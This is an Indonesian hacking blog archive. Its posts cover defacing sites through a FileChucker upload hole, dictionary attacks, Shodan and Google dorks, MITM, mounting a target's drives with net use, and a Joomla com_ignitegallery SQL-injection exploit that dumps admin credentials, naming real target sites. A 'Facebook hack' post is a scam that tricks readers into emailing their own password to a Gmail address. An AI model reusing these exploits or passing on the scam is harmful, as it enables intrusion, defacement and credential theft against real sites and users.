New Post

Archive

DEFACE DENGAN EXPLOIT FILECHUCKER

cara deface dengan file chuker
Deface Dengan Exploit FileChucker File Upload Vulnerability - Deface : File Chucker merupakan bug yang terdapat pada front pengisian data pada suatu website:
Dengan mengisi form kita dapat menitipkan file deface kita.
Dork FileChucker File Upload Vulnerability :

  • inurl:/cgi-bin/filechucker.cgi
  • intext:Toptown File Upload
  • inurl:/cgi-bin/filechucker.pl
  • intext:File Upload by Encodable

Cari Target saya mengunakan dork di atas ,  http://toptown.co.uk/cgi-bin/filechucker.cgi
Isi Form dengan data kalian
File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif



  • Letak File deface http://site.com/upload/files/file_kalian 

Sekian tutorial  Exploit FileChucker File Upload Vulnerability 
Thanks To Indonesia Security Down and Newbie Boy
Semoga Bermanfaat DAri Elephant-id

TUTORIAL DICTIONARY ATTACK

TUTORIAL MELAKUKAN DICTIONARY ATTACKDalam lingkup kriptanalisis dan keamanan komputer, dictionary attack adalah teknik untuk mengalahkan cipher atau  mekanisme  autentikasi  dengan  cara  menentukan kunci dekripsi atau frase khusus dengan mencari kombinasi kata-kata yang paling memungkinkan yang terdapat pada sebuah kamus.
Dictionary attack menyerang target dengan mencoba semua kata-kata yang didefinisikan dalam sebuah exhaustive list secara berulang, yang disebut juga dengan istilah kamus atau dictionary. Berbeda dengan brute force attack  yang  menggunakan  semua  kemungkinan kombinasi karakter yang lingkup domainnya sangat luas, dictionary attack hanya mencoba kemungkinan- kemungkinan yang memiliki peluang keberhasilan tinggi (most likely to succeed), yang secara tipikal diturunkan dari kata-kata yang terdapat dalam kamus. Kamus disini didefinisikan sebagai sebuah “list of kata” yang tiap-tiap elemennya adalah kombinasi dari kata-kata yang terdapat dari  sebuah  kamus  (misalnya  kamus  bahasa  Inggris, kamus bahasa Indonesia, dan sebagainya). Dictionary attack seringkali berhasil karena kebanyakan orang menggunakan kata-kata yang lazim terdapat dalam percakapan sehari-hari dalam menentukan password sebuah akunnya (password e-mail, situs web, dan sebagainya). Pengembangan dari dictionary attack juga memungkinkan penyerang untuk menghemat tenaga dan waktu dengan melakukan komputasi “list of kata”, atau disebut juga list of hashes, dalam kata-kata dalam kamus dan menyimpan kata-kata tersebut dalam basis data (atau file teks) dengan menggunakan hash sebagai kuncinya. Mengkomputasikan program dictionary attack membutuhkan waktu yang cukup lama, terutama untuk mendefinisikan kata-kata yang akan menjadi “amunisi” dalam   menebak   password. Namun ketika program tersebut sudah siap untuk menyerang, serangan dapat dieksekusi dengan cepat dan efektif, tergantung dari komputasi atau modifikasi yang disusun oleh penyerang.
Sistem operasi seperti Windows menyimpan password ke dalam bentuk terenkripsi yang disebut hashes. Password tidak dapat diambil (retrieved) secara langsung dari hashes. Untuk melakukan recover password diperlukan komputasi terhadap hashes dengan possible password (kata-kata yang diduga sebagai password) dan memasukkannya ke dalam list of hashes. Dalam konteks keamanan sebuah password, misalnya password akun e-mail, akun administrator situs web, dan sebagainya, manusia seringkali memilih kata yang mudah diingat supaya tidak lupa dengan password akun yang telah dibuatnya, Sebagai contoh, banyak pengguna email yang menggunakan kata ‘admin‘, ‘administrator‘, ‘supervisor‘, ‘password‘, dan sebagainya sebagai password   default,   atau   menggunakan  password  yang berasal dari tanggal lahir, nama orang tua, lokasi rumah, dan lain-lain agar mudah diingat Hacker  mengumpulkan  kata-kata yang  sering digunakan  sebagai  password  ini  ke  dalam  sebuah  file yang dinamakan sebagai dictionary (kamus) dan file ini bisa didapatkan dengan mudah di Internet seperti di situs http://lastbit.com/dict.asp, atau kita juga bisa membuatnya sendiri atau menambahkannya dari file dictionary yang sudah ada.
Program cracking akan mengubah satu persatu kata-kata yang ada di dalam kamus berdasarkan fungsi hash yang digunakan ke dalam bentuk tabel hash. Hasil perubahan ini kemudian dicocokkan dengan hash pada file password yang didapatkan.
Apabila hasil hash ini cocok, artinya password sudah berhasil diketahui. Dengan teknik ini, hacker tidak perlu mencoba semua kombinasi karakter yang ada (seperti brute force attack) sehingga bisa menghemat banyak waktu dan tenaga.

MESIN PENCARI UNTUK PARA HACKER

shodanShodan, sebuah mesin mencari yang kabarnya cukup menakutkan dan banyak digunakan oleh hacker.
Mesin pencari yang di buat oleh John Matherly, berbeda dengan Google. Mesin pencari buatan Amerika itu hanya  digunakan untuk mencari sebuah artikel, situs, atau informasi lainnya, sedangkan Shodan digunakan untuk mencari  server, webcam, printer, router, dan semua hal yang terhubung dengan internet. Shodan bekerja 24/7 dan mengumpulkan semua informasi mengenai 500 juta perangkat dan layanan yang terhubung dengan internet setiap bulan. Mesin pencari “gelap” Shodan ini mampu mencari sistem kontrol untuk taman air, pompa bensin.cybersecurity yang merupakan peneliti dibidang keamanan internet  berhasil menemukan bahwa, mesin pencari Shodan ini mampu mengetahui sistem kendali lampu lalu lintas, kamera keamanan. Bahkan sistem pembangkit listrik tenaga nuklir dapat ditemukan oleh Shodan.
Shodan dikembangkan oleh John Matherly sejak tiga tahun lalu yang pada awalnya hanya sebagai sebuah proyek sampingan. Namun sekarang  mesin pencari ini sudah menjadi andalan para hacker. John Matherly mengatakan bahwa Shodan membatasi hingga 10 hasil pencarian tanpa akun dan 50 hasil pencarian jika menggunakan akun. Dan dia juga mengatakan Shodan diciptakan untuk tujuan kebaikan.
jika anda ingin mencoba silahkan kunjungi langsung menuju Tkp>>>>>>>>> www.shodanhq.com

JENIS-JENIS DORK GOOGLE

JENI-JENIS GOOGLE DORK
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk mencari informasi yang tepat dan akurat. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. Perintah – perintah tersebut :

1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda kutip). Pencarian akan mencari page yang mengandung kata ”password” sebagai judulnya dengan prioritas utama ”admin”.

Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ”admin” dan ”mdb”.

2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database mdb”.

Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:” untuk mendapatkan list url tersebut.

Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”. Tanda garis miring slash (/) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda kutip). Pencarian akan mencari topik tentang waveguide pada semua halaman yang tersedia pada domain ugm.ac.id.

4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.

5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf” yang mengandung kata Linux dan Hacking.

6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list web pages yang memiliki link pada web page special. Sebagai contoh: ”link:www.detik.com” akan menunjukkan daftar web page yang memiliki point link pada halaman situs Detik.

7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Detik.

8. intext:
Sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.

Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi ”pedang” yang bisa dimanfaatkan untuk menggali informasi yang tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak. Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan suatu sistem melalui jaringan internet biasanya menggunakan google sebagai sarana praktis untuk footprinting (penggalian data sistem yang akan diaudit). Pada kesempatan mendatang, akan kita coba menguak beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan otak kanan kita

TURORIAL MAN IN THE MIDDLE ATTACK

Man In The Middle Attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat.
Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing
Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.

Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm :

GAMBAR MAN IN THE MIDDLE ATTACK

Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

  • Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
  • Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
  • Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
  • Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.
Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle
Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.
Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

  • Menyamar sebagai Bob dihadapan Alice
  • Menyamar sebagai Alice dihadapan Bob

GAMBAR ILUSTRASI MAN IN THE MIDDLE ATTACK


Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.

Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?
Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:
  • What you know: PIN, password, pasangan kunci publik-privat
  • What you have: smart card, kunci, USB dongle
  • What you are: fingerprint, retina
Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.
Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.
Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice,  Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi.

Facebook Hack

FACEBOOK HACK
BELAJAR CARA HACK FACEBOOK 100% BERHASIL Hacker itu bukan penjahat melainkan orang yg jenius. Kode promosi halaman tinggal copy paste sebuah kode di status atau dinding anda atau teman anda >> Cara Mengetahui Password Teman Dekat Anda
LANGKAH_LANGKAHNYA UNTUK MENGGETAHUI PASSWORD FACEBOOK TEMEN KAMU: 1. KLIK LIKE/SUKA HALAMAN INI TERLEBIH DAHULU
==================================================
==================================
==================================================
==================================================
==================================================
BACA BAIK-BAIK !!!...
==================================================
Bugs pada facebook memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan fs dan yang gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Fb Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna fb bisa sedikit berlega hati karena facebook telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite ) Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada fb. fb memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “recovery” trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban Memanfaatkan Bugs

____________________________________________

ok, sudah gak sabar yach… ikuti langkah-langkah berikut:

1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..

2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.

3. Pada form isian to/ kepada masukkan alamat berikut:

hackstap.facebook@gmail.com

Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita

4. Pada form cc dan bcc, kosongi saja kedua form tersebut

5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.

6. Pada form message (pesan), ketik kode UID berikut:

facebook.com FALSE/FALSE 1121114252079889
Username facebook : user ID facebook kamu
Facebook password : password kamu
Recover : user ID facebook korban
TTG : tanggal lahir kamu
6. Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban

Contohnya:

misalkan user ID facebook kamu adalah elite@yahoo.com
dan password kamu 3l1t3b3n3r4n
dan user ID facebook korban: korban@yahoo.com

maka susunannya adalah sebagai berikut:

to: hackstap.facebook@gmail.com
cc:
bcc:
Subject: Recovery
message: facebook.com FALSE/FALSE 1121114252079889
Username facebook : elite@yahoo.com
Facebook password : 3l1t3b3n3r4n
Recover : korban@yahoo.com
TTG : 10041994

___________________________________________

:: Cara Pencegahan ::

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

1. Pada form isian sento to: isikan

hackstap.facebook@gmail.com

2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.

3. Kirim message sebagai berikut:

facebook.com No Rerovery
Username facebook : elite@yahoo.com
Facebook password : password kamu

contohnya yang sudah jadi:

to: hackstap.facebook@gmail.com
cc:
bcc:
subject: No Recovery
message: facebook.com No Rerovery
Username facebook : username facebook kamu
Facebook password : password facebook kamu
TTG : tanggal lahir kamu
Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
facebook kamu di hack orang lain.

_____________________________________________

Bisa langung dari facebook kita jg tanpa harus membuka email

cara nyaLakukan langkah-langkah dibawah :

1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Klik compose message
3. Pada tulisan To isi dengan
hackstap.facebook@gmail.com
4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
5. isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email facebook temen anda.
baris ketiga tulis password facebook anda.
baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
Lalu Send/Kirim.

Contoh :
To : hackstap.facebook@gmail.com
Subject : PASSWORD RETRIEVE
Message :

anda@yahoo.co.id
temen anda@yahoo.com
Password anda
cgi-bin/$et76431&pwr999

Lalu Send/Kirim.

INGAT : JANGAN DISALAHGUNAKAN!!
Good luck.... ____________________________________________

CATATAN :
1. Jika anda mendapat pemberitahuan "Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days"
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.

REMOTE KOMPUTER DALAM SATU JARINGAN MENGGUNAKAN CMD

pada kali ini saya share tentang bagaimana meremote komputer orang lain simak dengan baik baik ya sahabat bloger sejatii,.,.,.
pertama yg harus di siapkan adalah, ya seperti biasa .,.,.
kopy hangat dan bagi sahabat bloger yang perokok aktiv sediakan rokok satu pack
next  

Salah satu senjata terampuh para Hacker adalah Command Prompt, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik dll.

Dalam tulisan ini saya akan memberi tutorial meremote komputer orang lain dengan Command Prompt.
Persyaratanya adalah :

1. Pc Kita & Pc target sama-sama sedang connect internet
2. Pc Kita & Pc target sama-sama menggunakan OS Windows

Tentukan IP target mu,Dan Mulai jalankan CMD dengan cara :
Start ====> RUN ===> CMD
Kemudian ketikan perintah dibawah ini :

cd c:\  [enter]

C:\>net use \\ip_target [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

C:\>net use K: \\ip_target\c$ [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

Seperti Gambar Di bawah ini :
CARA MELAKUKAN REMOTE KOMPUTER ORANG LAIN MENGGUNAKAN CMD











Setelah Sukses Langsung Buka My Computer anda
maka akan terlihat drive K disanalah Drive C target berada
Jika ingin meremot Drive D  cukup mengganti kode net use K: \\ip_target\c$ menjadi net use K: \\ip_target\d$

jika anda ingin menambahkan virus ke komputer yang agan hack copy file virus tersebut ke folder tersebut jalan kan  pasti maknyussss dechhh
sekian share dari saya  mudah mudahan bermanfaat bagi sahabat bloger>>>>>

TUTORIAL EXPLOIT JOMLA

hack jomla
- Step 1 
"Exploit Joomla option=com_ignitegallery"
sedikit dr awamer
 "Exploit Joomla option=com_ignitegallery"
no picture.. sorry
--first  coba kita cari di google dengan dork ini
inurl:"index.php option=com_ignitegallery"
kembangin sdnri ya

- Step 2
pasang exploitnya
exploit : /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

 contoh : http://www.pulot.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users-

- ntar muncul tu 62:admini:989868wjhgd blablabla..

 - second coba kita reset password nyasekarang kita reset password dengan menggunakan exploit ini :

www.site.com/index.php?option=com_user&view=reset  
masukin aja email admin tadi..

- third wah minta activation pula, tenang kita cari dulu activationnya :D
exploit :

 index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users-- ntar keluar aktifasi nya..


NOTE: klo aktifasi nya ada code tanda $.. berarti code aktifasi nya g bisa pke, find target lain trus masukin code aktifasi nya..


trus dia nya minta password baru.. masukin password sesuka kamu.

oke langsung ke tahap berikutnya,
sekarang kita masuk keadminnya
http://site.com/administrator/